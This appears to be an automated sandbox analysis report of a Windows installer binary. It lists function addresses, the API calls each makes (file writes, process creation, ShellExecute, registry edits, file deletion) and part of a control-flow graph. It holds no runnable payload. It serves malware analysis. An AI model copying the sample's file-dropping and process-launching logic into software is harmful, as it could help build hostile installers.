ReadFile 3497->3501 3500 407ad4 2 API calls 3498->3500 3499->3489 3502 4041a7 CreateFileA 3500->3502 3503 40415a 3501->3503 3504 4041f6 3502->3504 3502->3508 3503->3494 3503->3508 3640 403b31 SetFilePointer 3504->3640 3506 404206 3641 403d52 3506->3641 3508->3409 3510 408299 5 API calls 3509->3510 3511 406117 3510->3511 3512 406136 3511->3512 3513 40611c 3511->3513 3514 407b3a 3 API calls 3512->3514 3686 407be3 wsprintfA 3513->3686 3515 40616c 3514->3515 3517 4061a4 3515->3517 3520 407b3a 3 API calls 3515->3520 3687 407ce8 lstrcatA 3517->3687 3519 406131 3677 404ae0 3519->3677 3520->3517 3523 40815b 17 API calls 3524 4061e5 3523->3524 3525 4062bc 3524->3525 3527 407b3a 3 API calls 3524->3527 3526 40815b 17 API calls 3525->3526 3528 4062ca 3526->3528 3530 406228 3527->3530 3529 4062e7 LoadImageA 3528->3529 3531 407e06 18 API calls 3528->3531 3532 406405 3529->3532 3533 40632f RegisterClassA 3529->3533 3530->3525 3537 40625a 3530->3537 3540 4078a4 CharNextA 3530->3540 3534 4062e5 3531->3534 3536 403903 2 API calls 3532->3536 3535 406374 SystemParametersInfoA CreateWindowExA 3533->3535 3569 40636d 3533->3569 3534->3529 3535->3532 3539 406411 3536->3539 3688 407cde lstrlenA 3537->3688 3544 404ae0 19 API calls 3539->3544 3539->3569 3540->3537 3547 406421 3544->3547 3550 406513 3547->3550 3551 40642e ShowWindow 3547->3551 3689 404c0d OleInitialize 3550->3689 3555 40820e 3 API calls 3551->3555 3558 406452 3555->3558 3557 40651f 3560 406541 3557->3560 3565 406524 3557->3565 3559 406464 GetClassInfoA 3558->3559 3561 40820e 3 API calls 3558->3561 3563 40648a GetClassInfoA RegisterClassA 3559->3563 3564 4064be DialogBoxParamA 3559->3564 3562 403903 2 API calls 3560->3562 3566 406463 3561->3566 3562->3569 3563->3564 3567 403903 2 API calls 3564->3567 3568 403903 2 API calls 3565->3568 3565->3569 3566->3559 3570 406504 3567->3570 3568->3569 3569->3400 3570->3569 3572 404326 CloseHandle 3571->3572 3573 40433a 3571->3573 3572->3573 3574 404344 CloseHandle 3573->3574 3575 404358 3573->3575 3574->3575 3700 4049da 3575->3700 3580->3407 3791 407cb6 lstrcpynA 3582->3791 3584 408176 3585 407935 3 API calls 3584->3585 3586 408184 3585->3586 3587 40462a 3586->3587 3588 407d37 5 API calls 3586->3588 3587->3400 3596 407cb6 lstrcpynA 3587->3596 3589 408197 3588->3589 3589->3587 3590 4081b7 lstrlenA 3589->3590 3593 408123 2 API calls 3589->3593 3595 4078ce 2 API calls 3589->3595 3590->3589 3591 4081ea 3590->3591 3592 407cf2 3 API calls 3591->3592 3594 4081ef GetFileAttributesA 3592->3594 3593->3589 3594->3587 3595->3589 3596->3436 3597->3408 3600 407850 3599->3600 3601 407855 MessageBoxIndirectA 3599->3601 3600->3601 3602 4078a0 3600->3602 3601->3602 3602->3417 3604 403845 2 API calls 3603->3604 3605 403925 3604->3605 3605->3417 3607 407d1c 3606->3607 3608 4042f0 3606->3608 3614 407ce8 lstrcatA 3607->3614 3608->3476 3611 407ae8 3610->3611 3612 407b27 3611->3612 3613 407aeb GetTickCount GetTempFileNameA 3611->3613 3612->3472 3613->3611 3613->3612 3615->3481 3616->3483 3618 4078e4 3617->3618 3619 4078e9 CharPrevA 3618->3619 3620 403f97 3618->3620 3619->3618 3619->3620 3621 407cb6 lstrcpynA 3620->3621 3621->3487 3623 403b22 3622->3623 3623->3489 3625 403a0b 3624->3625 3626 403a2d 3624->3626 3627 403a14 DestroyWindow 3625->3627 3628 403a1e 3625->3628 3629 403a36 3626->3629 3630 403a48 GetTickCount 3626->3630 3627->3628 3628->3494 3628->3508 3639 403b31 SetFilePointer 3628->3639 3631 408848 2 API calls 3629->3631 3630->3628 3632 403a5a 3630->3632 3631->3628 3633 403a63 3632->3633 3634 403a9b CreateDialogParamA ShowWindow 3632->3634 3633->3628 3655 40392c MulDiv 3633->3655 3635 403a99 3634->3635 3635->3628 3637 403a74 wsprintfA 3638 406fcb 23 API calls 3637->3638 3638->3635 3639->3497 3640->3506 3642 403d92 3641->3642 3643 403d62 SetFilePointer 3641->3643 3656 403b63 GetTickCount 3642->3656 3643->3642 3646 403ea8 3646->3508 3647 403da9 ReadFile 3647->3646 3648 403de2 3647->3648 3648->3646 3649 403b63 41 API calls 3648->3649 3650 403dfe 3649->3650 3650->3646 3651 403eba ReadFile 3650->3651 3653 403e15 3650->3653 3651->3646 3652 403e6b ReadFile 3652->3646 3652->3653 3653->3646 3653->3652 3654 403e23 WriteFile 3653->3654 3654->3646 3654->3653 3655->3637 3657 403b93 3656->3657 3658 403d35 3656->3658 3669 403b31 SetFilePointer 3657->3669 3659 4039fe 31 API calls 3658->3659 3665 403cec 3659->3665 3661 403ba3 SetFilePointer 3667 403be3 3661->3667 3662 403ae9 ReadFile 3662->3667 3664 4039fe 31 API calls 3664->3667 3665->3646 3665->3647 3666 403c98 WriteFile 3666->3665 3666->3667 3667->3662 3667->3664 3667->3665 3667->3666 3668 403d13 SetFilePointer 3667->3668 3670 40893d 3667->3670 3668->3658 3669->3661 3671 408cf0 3670->3671 3672 40896b 3670->3672 3671->3667 3672->3671 3673 408b69 GlobalAlloc 3672->3673 3674 408b4d GlobalFree 3672->3674 3675 408c55 GlobalAlloc 3672->3675 3676 408c45 GlobalFree 3672->3676 3673->3671 3673->3672 3674->3673 3675->3671 3675->3672 3676->3675 3678 404af5 3677->3678 3696 407be3 wsprintfA 3678->3696 3680 404b73 3681 407e06 18 API calls 3680->3681 3682 404b89 SetWindowTextA 3681->3682 3683 404bad 3682->3683 3684 404bcf 3683->3684 3685 407e06 18 API calls 3683->3685 3684->3523 3685->3683 3686->3519 3697 404bd7 3689->3697 3691 404c41 3693 403845 2 API calls 3691->3693 3695 404c64 3691->3695 3692 404bd7 SendMessageA 3694 404c81 OleUninitialize 3692->3694 3693->3691 3694->3557 3695->3692 3696->3680 3698 404be0 SendMessageA 3697->3698 3699 404c0a 3697->3699 3698->3699 3699->3691 3701 4049f4 3700->3701 3702 40435d 3701->3702 3703 4049f9 FreeLibrary GlobalFree 3701->3703 3704 4085b8 3702->3704 3703->3701 3705 40815b 17 API calls 3704->3705 3706 4085cf 3705->3706 3707 4085f3 3706->3707 3708 4085d6 DeleteFileA 3706->3708 3709 404371 OleUninitialize 3707->3709 3711 4087b6 3707->3711 3747 407cb6 lstrcpynA 3707->3747 3708->3709 3709->3411 3709->3412 3711->3709 3752 408123 FindFirstFileA 3711->3752 3712 408625 3714 408630 3712->3714 3715 408648 3712->3715 3755 407ce8 lstrcatA 3714->3755 3718 4078ce 2 API calls 3715->3718 3719 408644 3718->3719 3722 408671 lstrlenA FindFirstFileA 3719->3722 3756 407ce8 lstrcatA 3719->3756 3720 407cf2 3 API calls 3721 4087e2 3720->3721 3724 407a46 2 API calls 3721->3724 3722->3711 3742 4086a7 3722->3742 3726 4087eb RemoveDirectoryA 3724->3726 3728 4087fa 3726->3728 3729 40882c 3726->3729 3727 4078a4 CharNextA 3727->3742 3728->3709 3731 408800 3728->3731 3730 406fcb 23 API calls 3729->3730 3730->3709 3732 406fcb 23 API calls 3731->3732 3733 408810 3732->3733 3734 408311 39 API calls 3733->3734 3735 408822 3734->3735 3735->3709 3736 40878f FindNextFileA 3738 4087ac FindClose 3736->3738 3736->3742 3738->3711 3740 4085b8 56 API calls 3740->3742 3742->3727 3742->3736 3742->3740 3743 406fcb 23 API calls 3742->3743 3746 408751 3742->3746 3748 407cb6 lstrcpynA 3742->3748 3749 407a46 GetFileAttributesA 3742->3749 3743->3742 3744 406fcb 23 API calls 3744->3746 3746->3742 3746->3744 3757 408311 3746->3757 3747->3712 3748->3742 3750 407a71 DeleteFileA 3749->3750 3751 407a5f SetFileAttributesA 3749->3751 3750->3742 3751->3750 3753 408155 3752->3753 3754 408146 FindClose 3752->3754 3753->3709 3753->3720 3754->3753 3758 408299 5 API calls 3757->3758 3759 40832c 3758->3759 3760 408345 3759->3760 3763 4085a8 3759->3763 3783 407a78 GetFileAttributesA CreateFileA 3759->3783 3761 4083b5 GetShortPathNameA 3760->3761 3760->3763 3761->3763 3765 4083d5 3761->3765 3763->3746 3764 40837d CloseHandle GetShortPathNameA 3764->3760 3764->3763 3765->3763 3766 4083e0 wsprintfA 3765->3766 3767 407e06 18 API calls 3766->3767 3768 408423 3767->3768 3784 407a78 GetFileAttributesA CreateFileA 3768->3784 3770 408441 3770->3763 3771 40844f GetFileSize GlobalAlloc 3770->3771 3772 408488 ReadFile 3771->3772 3773 40859e CloseHandle 3771->3773 3772->3773 3774 4084b3 3772->3774 3773->3763 3774->3773 3785 4079b4 lstrlenA 3774->3785 3777 4084d2 3790 407cb6 lstrcpynA 3777->3790 3778 4084ee 3780 4079b4 3 API calls 3778->3780 3781 4084e8 3780->3781 3782 408547 SetFilePointer WriteFile GlobalFree 3781->3782 3782->3773 3783->3764 3784->3770 3786 4079d4 3785->3786 3787 407a05 3786->3787 3788 4079df lstrcmpiA 3786->3788 3787->3777 3787->3778 3788->3787 3789 407a09 CharNextA 3788->3789 3789->3786 3790->3781 3791->3584 4294 403376 4295 401456 18 API calls 4294->4295 4296 403394 4295->4296 4297 40339f SetFilePointer 4296->4297 4300 4033c9 4297->4300 4298 401456 18 API calls 4298->4300 4299 4037a0 4301 402a3c 4299->4301 4302 407e06 18 API calls 4299->4302 4300->4298 4300->4299 4300->4301 4302->4301 4303 4017f7 4304 402530 4303->4304 4307 407be3 wsprintfA 4304->4307 4306 40253c 4307->4306 4315 40247c GetDC GetDeviceCaps 4316 401456 18 API calls 4315->4316 4317 4024ad MulDiv 4316->4317 4318 401456 18 API calls 4317->4318 4319 4024d9 4318->4319 4320 407e06 18 API calls 4319->4320 4321 402520 CreateFontIndirectA 4320->4321 4322 40252f 4321->4322 4325 407be3 wsprintfA 4322->4325 4324 40253c 4325->4324 4326 40367d 4327 401456 18 API calls 4326->4327 4328 403689 4327->4328 4329 4036ae 4328->4329 4330 4036df 4328->4330 4335 402a3c 4328->4335 4333 4036b0 4329->4333 4339 4036ca 4329->4339 4331 403700 4330->4331 4332 4036eb 4330->4332 4336 407e06 18 API calls 4331->4336 4334 401456 18 API calls 4332->4334 4342 407cb6 lstrcpynA 4333->4342 4334->4335 4336->4335 4338 401456 18 API calls 4338->4339 4339->4335 4339->4338 4340 4037a0 4339->4340 4340->4335 4341 407e06 18 API calls 4340->4341 4341->4335 4342->4335 4343 401000 4344 401032 BeginPaint GetClientRect 4343->4344 4345 401017 DefWindowProcA 4343->4345 4347 401078 4344->4347 4350 401212 4345->4350 4348 401130 4347->4348 4349 401084 CreateBrushIndirect FillRect DeleteObject 4347->4349 4351 40113a CreateFontIndirectA 4348->4351 4352 4011db EndPaint 4348->4352 4349->4347 4351->4352 4353 401151 6 API calls 4351->4353 4352->4350 4353->4352 4361 401803 4362 40181c 4361->4362 4363 40180d ShowWindow 4361->4363 4364 40256d ShowWindow 4362->4364 4365 4037d4 4362->4365 4363->4362 4364->4365 4366 402583 4367 401400 18 API calls 4366->4367 4368 40258f 4367->4368 4369 401400 18 API calls 4368->4369 4370 40259e 4369->4370 4371 401400 18 API calls 4370->4371 4372 4025ad 4371->4372 4373 401400 18 API calls 4372->4373 4374 4025bc 4373->4374 4375 40163b 23 API calls 4374->4375 4376 4025c9 ShellExecuteA 4375->4376 3803 401b06 3804 401400 18 API calls 3803->3804 3805 401b12 3804->3805 3806 401b2b 3805->3806 3807 401b3d 3805->3807 3848 407cb6 lstrcpynA 3806->3848 3849 407cb6 lstrcpynA 3807->3849 3810 401b3b 3814 407d37 5 API calls 3810->3814 3811 401b51 3812 407cf2 3 API calls 3811->3812 3813 401b5b 3812->3813 3850 407ce8 lstrcatA 3813->3850 3816 401b76 3814->3816 3817 408123 2 API calls 3816->3817 3834 401ba9 3816->3834 3818 401b88 3817->3818 3821 401b91 CompareFileTime 3818->3821 3818->3834 3819 407a46 2 API calls 3819->3834 3821->3834 3822 401cce 3824 406fcb 23 API calls 3822->3824 3823 401c05 3825 406fcb 23 API calls 3823->3825 3827 401cde 3824->3827 3828 401c15 3825->3828 3826 407cb6 lstrcpynA 3826->3834 3829 403d52 46 API calls 3827->3829 3830 401d08 3829->3830 3831 401d25 SetFileTime 3830->3831 3833 401d47 FindCloseChangeNotification 3830->3833 3831->3833 3832 407e06 18 API calls 3832->3834 3833->3828 3835 401d59 3833->3835 3834->3819 3834->3822 3834->3823 3834->3826 3834->3832 3841 407836 MessageBoxIndirectA 3834->3841 3844 401ca5 3834->3844 3847 407a78 GetFileAttributesA CreateFileA 3834->3847 3836 401d86 3835->3836 3837 401d5e 3835->3837 3839 407e06 18 API calls 3836->3839 3838 407e06 18 API calls 3837->3838 3840 401d72 3838->3840 3843 401d84 3839->3843 3851 407ce8 lstrcatA 3840->3851 3841->3834 3845 407836 MessageBoxIndirectA 3843->3845 3844->3828 3846 406fcb 23 API calls 3844->3846 3845->3828 3846->3828 3847->3834 3848->3810 3849->3811 4384 402008 4385 401456 18 API calls 4384->4385 4386 402016 4385->4386 4387 401456 18 API calls 4386->4387 4388 402025 4387->4388 4391 407be3 wsprintfA 4388->4391 4390 402332 4391->4390 4392 401f08 4393 401400 18 API calls 4392->4393 4394 401f14 4393->4394 4395 401400 18 API calls 4394->4395 4396 401f23 4395->4396 4397 401f34 lstrcmpiA 4396->4397 4398 401f3c lstrcmpA 4396->4398 4399 401f42 4397->4399 4398->4399 4400 402988 4401 401400 18 API calls 4400->4401 4402 402994 4401->4402 4403 401400 18 API calls 4402->4403 4404 4029a7 4403->4404 4405 401400 18 API calls 4404->4405 4406 4029b6 4405->4406 4407 401400 18 API calls 4406->4407 4408 4029c9 4407->4408 4409 401400 18 API calls 4408->4409 4411 4029d8 4409->4411 4410 4029f9 CoCreateInstance 4412 402a2f 4410->4412 4419 402a46 4410->4419 4411->4410 4413 401400 18 API calls 4411->4413 4415 40163b 23 API calls 4412->4415 4414 4029f8 4413->4414 4414->4410 4417 402a3b 4415->4417 4416 402bc5 4418 40163b 23 API calls 4416->4418 4418->4417 4420 402b39 MultiByteToWideChar 4419->4420 4421 402b7c 4419->4421 4420->4421 4421->4412 4421->4416 4422 403089 4431 4015b0 4422->4431 4424 403095 4425 401456 18 API calls 4424->4425 4426 4030a4 4425->4426 4427 4030e5 RegEnumValueA 4426->4427 4428 4030c7 RegEnumKeyA 4426->4428 4430 402a3c 4426->4430 4429 40312b RegCloseKey 4427->4429 4427->4430 4428->4429 4429->4430 4432 401400 18 API calls 4431->4432 4433 4015cc RegOpenKeyExA 4432->4433 4433->4424 4435 40710b 4436 4073a5 4435->4436 4450 40712c 4435->4450 4437 407404 4436->4437 4438 4073ad GetDlgItem CreateThread CloseHandle 4436->4438 4440 40740c 4437->4440 4441 40744f 4437->4441 4439 4074ba 4438->4439 4443 407449 4439->4443 4448 4074cd SendMessageA 4439->4448 4442 407418 ShowWindow ShowWindow 4440->4442 4440->4443 4441->4439 4444 407473 ShowWindow 4441->4444 4455 407460 4441->4455 4483 404c96 SendMessageA 4442->4483 4445 404f0f 8 API calls 4443->4445 4447 407494 4444->4447 4444->4455 4449 407687 4445->4449 4451 406fcb 23 API calls 4447->4451 4448->4449 4453 4074fc CreatePopupMenu 4448->4453 4481 404c96 SendMessageA 4450->4481 4451->4455 4452 404cc8 SendMessageA 4452->4439 4456 407e06 18 API calls 4453->4456 4455->4452 4458 407518 AppendMenuA 4456->4458 4457 4071b9 4462 4071c6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4457->4462 4459 407540 GetWindowRect 4458->4459 4460 40755a 4458->4460 4461 407564 TrackPopupMenu 4459->4461 4460->4461 4461->4449 4463 40759e 4461->4463 4464 407247 SendMessageA SendMessageA 4462->4464 4465 40727f 4462->4465 4468 4075c4 SendMessageA 4463->4468 4469 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4463->4469 4464->4465 4466 407285 SendMessageA 4465->4466 4467 4072a8 4465->4467 4466->4467 4470 404d65 18 API calls 4467->4470 4468->4463 4471 40762a SendMessageA 4469->4471 4472 4072c5 4470->4472 4471->4471 4473 407664 GlobalUnlock SetClipboardData CloseClipboard 4471->4473 4474 4072d1 ShowWindow 4472->4474 4475 40731c SendMessageA 4472->4475 4473->4449 4476 4072f4 ShowWindow 4474->4476 4477 407305 4474->4477 4475->4449 4480 407365 SendMessageA SendMessageA 4475->4480 4476->4477 4482 404c96 SendMessageA 4477->4482 4480->4449 4481->4457 4482->4475 4483->4443 4484 403491 4485 401400 18 API calls 4484->4485 4487 40349d 4485->4487 4486 4034b9 4489 407a46 2 API calls 4486->4489 4487->4486 4488 401400 18 API calls 4487->4488 4488->4486 4490 4034c2 4489->4490 4511 407a78 GetFileAttributesA CreateFileA 4490->4511 4492 4034db 4493 403500 GlobalAlloc 4492->4493 4494 4034e7 DeleteFileA 4492->4494 4496 403644 CloseHandle 4493->4496 4497 40352f 4493->4497 4495 403668 4494->4495 4499 40163b 23 API calls 4495->4499 4505 403677 4495->4505 4496->4494 4496->4495 4512 403b31 SetFilePointer 4497->4512 4499->4505 4500 40353b 4501 403ae9 ReadFile 4500->4501 4502 40354e GlobalAlloc 4501->4502 4503 40356b 4502->4503 4504 4035dd WriteFile GlobalFree 4502->4504 4506 403d52 46 API calls 4503->4506 4507 403d52 46 API calls 4504->4507 4509 40358f 4506->4509 4508 40363f 4507->4508 4508->4496 4510 4035d3 GlobalFree 4509->4510 4510->4504 4511->4492 4512->4500 3340 402613 3341 401400 18 API calls 3340->3341 3342 40261f 3341->3342 3343 406fcb 23 API calls 3342->3343 3344 402632 3343->3344 3356 407779 CreateProcessA 3344->3356 3346 40263c 3347 402656 WaitForSingleObject 3346->3347 3348 402a3c 3346->3348 3355 4026b1 CloseHandle 3346->3355 3359 408848 3346->3359 3347->3346 3350 40267b GetExitCodeProcess 3347->3350 3353 402699 3350->3353 3350->3355 3351 403677 3351->3348 3363 407be3 wsprintfA 3353->3363 3355->3348 3355->3351 3357 4077f5 3356->3357 3358 4077e5 CloseHandle 3356->3358 3357->3346 3358->3357 3360 40885d PeekMessageA 3359->3360 3361 408881 DispatchMessageA 3360->3361 3362 40888d 3360->3362 3361->3360 3362->3346 3363->3355 3364 401714 3365 40171c 3364->3365 3368 403845 3365->3368 3370 403854 3368->3370 3369 40172e 3370->3369 3371 4038a0 MulDiv SendMessageA 3370->3371 3371->3370 4520 406614 GetDlgItem GetDlgItem 4521 406671 7 API calls 4520->4521 4526 4069d1 4520->4526 4522 406797 DeleteObject 4521->4522 4523 406777 SendMessageA 4521->4523 4524 4067b0 4522->4524 4523->4522 4528 407e06 18 API calls 4524->4528 4531 40681b 4524->4531 4525 406af3 4529 406b30 4525->4529 4530 406bf6 4525->4530 4526->4525 4527 406a56 4526->4527 4539 406557 4 API calls 4526->4539 4527->4525 4537 406ad0 SendMessageA 4527->4537 4551 406c7a 4527->4551 4534 4067d9 SendMessageA SendMessageA 4528->4534 4540 406b49 SendMessageA 4529->4540 4565 4069cb 4529->4565 4532 406c28 4530->4532 4533 406bff SendMessageA 4530->4533 4535 404d65 18 API calls 4531->4535 4538 406c31 4532->4538 4532->4551 4533->4565 4534->4524 4541 40683e 4535->4541 4536 404f0f 8 API calls 4542 406eca 4536->4542 4537->4525 4543 406c44 4538->4543 4544 406c3a ImageList_Destroy 4538->4544 4539->4527 4545 406b7b SendMessageA 4540->4545 4540->4565 4546 404d65 18 API calls 4541->4546 4547 406c4d GlobalFree 4543->4547 4543->4565 4544->4543 4548 406ba1 4545->4548 4549 40685d 4546->4549 4547->4565 4554 406bbf SendMessageA 4548->4554 4552 40696b 4549->4552 4557 4068b2 SendMessageA 4549->4557 4560 406902 SendMessageA 4549->4560 4561 406926 SendMessageA 4549->4561 4550 406e73 ShowWindow GetDlgItem ShowWindow 4550->4565 4553 403903 2 API calls 4551->4553 4564 406caf 4551->4564 4571 406e5e 4551->4571 4555 406971 GetWindowLongA SetWindowLongA 4552->4555 4556 40699f 4552->4556 4553->4564 4554->4551 4555->4556 4558 4069c3 4556->4558 4559 4069a5 ShowWindow 4556->4559 4557->4549 4572 404c96 SendMessageA 4558->4572 4559->4558 4560->4549 4561->4549 4563 406e0a InvalidateRect 4566 406e31 4563->4566 4563->4571 4567 406ced SendMessageA 4564->4567 4568 406d17 4564->4568 4565->4536 4570 404da2 21 API calls 4566->4570 4567->4568 4568->4563 4569 406da4 SendMessageA SendMessageA 4568->4569 4569->4568 4570->4571 4571->4550 4571->4565 4572->4565 4573 40239a 4574 401456 18 API calls 4573->4574 4575 4023ae SetWindowLongA 4574->4575 4576 40382c 4575->4576 4577 402f9d 4578 4015b0 19 API calls 4577->4578 4579 402fa9 4578->4579 4580 401400 18 API calls 4579->4580 4581 402fbc 4580->4581 4582 402fd1 RegQueryValueExA 4581->4582 4586 402a3c 4581->4586 4583 403025 RegCloseKey 4582->4583 4584 403015 4582->4584 4583->4586 4584->4583 4588 407be3 wsprintfA 4584->4588 4588->4583 4589 401a9e 4590 401400 18 API calls 4589->4590 4591 401aaa SearchPathA 4590->4591 4592 402dab 4591->4592 4593 40319e 4594 4031c0 4593->4594 4595 4031a7 4593->4595 4596 401400 18 API calls 4594->4596 4597 401456 18 API calls 4595->4597 4598 4031cc 4596->4598 4600 4031b3 4597->4600 4603 407cde lstrlenA 4598->4603 4601 4031f8 WriteFile 4600->4601 4602 403831 4600->4602 4601->4602 4604 4097a6 4605 408cf0 4604->4605 4606 408a96 4604->4606 4606->4605 4607 408b69 GlobalAlloc 4606->4607 4608 408b4d GlobalFree 4606->4608 4609 408c55 GlobalAlloc 4606->4609 4610 408c45 GlobalFree 4606->4610 4607->4605 4607->4606 4608->4607 4609->4605 4609->4606 4610->4609 4611 402727 4612 401400 18 API calls 4611->4612 4613 402733 4612->4613 4614 408299 5 API calls 4613->4614 4615 402746 4614->4615 4616 40277c GlobalAlloc 4615->4616 4620 402a3c 4615->4620 4617 402799 4616->4617 4616->4620 4618 408299 5 API calls 4617->4618 4619 4027a5 4618->4619 4621 408299 5 API calls 4619->4621 4624 4027b8 4621->4624 4622 4027e5 GlobalFree 4622->4620 4624->4622 4628 407be3 wsprintfA 4624->4628 4626 40282d 4629 407be3 wsprintfA 4626->4629 4628->4626 4629->4622 4637 402ca8 4638 402101 4637->4638 4642 402127 4637->4642 4639 407e06 18 API calls 4638->4639 4640 402115 4639->4640 4641 407836 MessageBoxIndirectA 4640->4641 4641->4642 4643 401e29 4644 401400 18 API calls 4643->4644 4645 401e35 4644->4645 4650 407cde lstrlenA 4645->4650 4651 40342b 4652 401400 18 API calls 4651->4652 4653 403437 FindFirstFileA 4652->4653 4654 403452 4653->4654 4655 40346b 4653->4655 4659 407be3 wsprintfA 4655->4659 4657 40347d 4660 407cb6 lstrcpynA 4657->4660 4659->4657 4660->4654 4661 405bab 4662 405bc1 4661->4662 4663 405be9 4661->4663 4671 407805 GetDlgItemTextA 4662->4671 4665 405c39 4663->4665 4666 405bee SHGetPathFromIDListA 4663->4666 4667 405c04 4666->4667 4670 405bd1 SendMessageA 4666->4670 4669 403903 2 API calls 4667->4669 4669->4670 4670->4665 4671->4670 4672 40322e 4673 401456 18 API calls 4672->4673 4678 40323c 4673->4678 4674 4032d8 4675 40326b ReadFile 4675->4674 4675->4678 4676 4032bf 4681 407be3 wsprintfA 4676->4681 4678->4674 4678->4675 4678->4676 4679 4032ef 4678->4679 4679->4674 4680 4032fb SetFilePointer 4679->4680 4680->4674 4681->4674 4682 4020ae 4683 401400 18 API calls 4682->4683 4684 4020ba 4683->4684 4685 401456 18 API calls 4684->4685 4686 4020c9 wsprintfA 4685->4686 4687 40382f 4686->4687 4688 401db0 4689 401e0c 4688->4689 4690 401400 18 API calls 4689->4690 4691 401e11 4690->4691 4692 4085b8 63 API calls 4691->4692 4693 401e24 4692->4693 4694 402d34 4695 401400 18 API calls 4694->4695 4696 402d4a 4695->4696 4697 401400 18 API calls 4696->4697 4698 402d59 4697->4698 4699 401400 18 API calls 4698->4699 4700 402d6c GetPrivateProfileStringA 4699->4700 4701 402dab 4700->4701 4702 4057b5 4703 40597b 4702->4703 4705 4057d0 4702->4705 4704 405a0b 4703->4704 4706 405987 4703->4706 4707 405a06 4704->4707 4709 405a14 GetDlgItem 4704->4709 4708 404d65 18 API calls 4705->4708 4706->4707 4714 4059b0 GetDlgItem SendMessageA 4706->4714 4711 404f0f 8 API calls 4707->4711 4710 40583a 4708->4710 4712 405b02 4709->4712 4713 405a37 4709->4713 4715 404d65 18 API calls 4710->4715 4716 405b9a 4711->4716 4712->4707 4717 405b14 4712->4717 4713->4712 4720 405a65 SendMessageA 4713->4720 4739 404d44 EnableWindow 4714->4739 4719 405857 CheckDlgButton 4715->4719 4721 405b43 4717->4721 4722 405b1a SendMessageA 4717->4722 4736 404d44 EnableWindow 4719->4736 4728 405aa2 SetCursor ShellExecuteA 4720->4728 4721->4716 4725 405b4e SendMessageA 4721->4725 4722->4721 4723 405a00 4740 404d05 SendMessageA 4723->4740 4725->4716 4727 405880 GetDlgItem 4737 404c96 SendMessageA 4727->4737 4730 405afa SetCursor 4728->4730 4730->4712 4731 4058a1 SendMessageA 4732 4058e0 SendMessageA SendMessageA 4731->4732 4733 4058d4 GetSysColor 4731->4733 4738 407cde lstrlenA 4732->4738 4733->4732 4736->4727 4737->4731 4739->4723 4740->4707 4741 402db6 4742 402e00 4741->4742 4743 402dbf 4741->4743 4745 401400 18 API calls 4742->4745 4744 4015b0 19 API calls 4743->4744 4746 402dcb 4744->4746 4747 402e0c 4745->4747 4748 401400 18 API calls 4746->4748 4751 402a3c 4746->4751 4752 401482 RegOpenKeyExA 4747->4752 4750 402de2 RegDeleteValueA RegCloseKey 4748->4750 4750->4751 4754 4014ca 4752->4754 4759 401561 4752->4759 4753 401540 RegCloseKey 4756 408299 5 API calls 4753->4756 4754->4753 4755 401511 RegCloseKey 4754->4755 4757 401482 5 API calls 4754->4757 4755->4759 4758 40155c 4756->4758 4757->4754 4758->4759 4760 40158f RegDeleteKeyA 4758->4760 4759->4751 4760->4759 4761 401737 4762 406fcb 23 API calls 4761->4762 4763 401747 4762->4763 4764 401fb8 4765 401456 18 API calls 4764->4765 4766 401fc4 4765->4766 4767 401456 18 API calls 4766->4767 4768 401fd3 4767->4768 4769 402339 4770 401456 18 API calls 4769->4770 4771 402345 IsWindow 4770->4771 4772 402354 4771->4772 4773 401db9 4774 401400 18 API calls 4773->4774 4775 401dc5 4774->4775 4776 407836 MessageBoxIndirectA 4775->4776 4777 401dd8 4776->4777 4778 40183b 4779 401400 18 API calls 4778->4779 4780 401847 SetFileAttributesA 4779->4780 4781 401aff 4780->4781 4782 40573f 4783 405792 4782->4783 4784 405759 4782->4784 4785 404f0f 8 API calls 4783->4785 4786 404d65 18 API calls 4784->4786 4787 4057a8 4785->4787 4788 405770 4786->4788 4790 4077fb SetDlgItemTextA 4788->4790 4791 402cbf 4792 402cd1 4791->4792 4793 402cc5 4791->4793 4794 402ceb 4792->4794 4796 401400 18 API calls 4792->4796 4795 401400 18 API calls 4793->4795 4797 402d05 4794->4797 4798 401400 18 API calls 4794->4798 4795->4792 4796->4794 4799 401400 18 API calls 4797->4799 4798->4797 4800 402d14 WritePrivateProfileStringA 4799->4800 4801 402d2d 4800->4801

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 00404375 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 398comfilestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 404375-404399 SetErrorMode GetVersion 1 4043b6 0->1 2 40439b-4043aa call 408299 0->2 4 4043bb-4043be 1->4 2->1 8 4043ac-4043b5 2->8 6 4043c0-4043c3 call 40820e 4->6 7 4043d9-404492 call 408299 * 2 InitCommonControls OleInitialize SHGetFileInfoA call 407cb6 GetCommandLineA call 407cb6 GetModuleHandleA 4->7 11 4043c8-4043d7 lstrlenA 6->11 20 404494-404499 7->20 21 40449e-4044b8 call 4078a4 CharNextA 7->21 8->1 11->4 20->21 24 4044be-4044c1 21->24 25 404560-40457e GetTempPathA call 4042bc 24->25 26 4044c7-4044cc 24->26 33 404580-40459f DeleteFileA call 403f03 25->33 34 4045a7-4045db GetWindowsDirectoryA call 407ce8 call 4042bc 25->34 27 4044d1-4044d9 26->27 28 4044ce-4044cf 26->28 30 4044e1-4044e4 27->30 31 4044db-4044dc 27->31 28->26 35 404543-40455b call 4078a4 30->35 36 4044e6-4044ed 30->36 31->30 47 4045a5-4045ee 33->47 48 404817-404824 call 404316 OleUninitialize 33->48 34->33 58 4045dd-4045e2 34->58 35->24 37 404500-404507 36->37 38 4044ef-4044fd 36->38 43 404509-404517 37->43 44 40451a-404521 37->44 38->37 43->44 49 404541 44->49 50 404523-40453f call 407cb6 44->50 59 404802-40480c call 4060fd 47->59 60 4045f4-404609 call 4078a4 47->60 62 404844-40484b 48->62 63 404826-40483f call 407836 48->63 49->35 50->25 64 404815 58->64 66 404811-404813 59->66 74 40460a-40460f 60->74 68 404851-40488e call 408299 * 3 62->68 69 40499e-4049a9 62->69 71 4049ac ExitProcess 63->71 64->48 66->48 92 404933-404942 call 408299 68->92 93 404894-40489b 68->93 69->71 76 404611-404617 74->76 77 404662-404681 call 4082eb call 407ce8 74->77 80 404619-40461a 76->80 81 40461c-40462d call 40815b 76->81 95 404683-404698 call 407ce8 77->95 96 404699-4046c8 call 407ce8 lstrcmpiA 77->96 80->74 89 404639-40465d 